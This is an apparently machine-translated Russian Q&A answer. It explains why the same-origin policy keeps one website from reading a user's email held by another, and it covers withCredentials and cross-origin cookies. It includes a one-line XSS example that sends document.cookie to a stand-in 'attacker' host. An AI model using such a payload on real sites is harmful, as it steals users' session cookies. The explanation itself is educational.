Короче говоря, вы не можете сделать это, если веб-сайт, который уже знает идентификатор электронной почты пользователя, не желает публиковать его.
В соответствии с политикой того же происхождения веб-браузер разрешает сценарии, содержащиеся на первой веб-странице,получить доступ к данным на второй веб-странице, но только если обе веб-страницы имеют одинаковое происхождение.[ Википедия - Политика одного и того же происхождения ]
С помощью withCredentials можно поддерживать файлы cookie в запросах перекрестного происхождения.Даже который не дает прямого доступа к вашему коду.withCredentials указывает, следует ли выполнять межсайтовые Access-Control запросы с использованием учетных данных, таких как файлы cookie, заголовки авторизации или клиентские сертификаты TLS.Настройка withCredentials не влияет на запросы того же сайта.[ Mozilla Dev ]
Вы можете получить доступ к файлам cookie того же происхождения, введя код JavaScript для межсайтовых сценариев (XSS).XSS - это инъекционная атака, которую злоумышленник совершает на веб-сайт, который при загрузке пользователем выполняет код на стороне клиента.XSS популярен для кражи файлов cookie, фишинга или даже регистрации ключей.
Пример атаки:
<script>
window.location='http://attacker/?cookie='+document.cookie
</script>
Но даже в этом случае вы получаете cookie этого домена при загрузке домена THAT, а не приВаш домен загружен.
Этот ответ только для ознакомительных целей